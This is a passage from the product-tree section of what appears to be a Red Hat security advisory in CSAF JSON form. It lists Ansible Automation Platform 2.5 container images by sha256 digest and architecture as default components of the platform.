"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le"
},
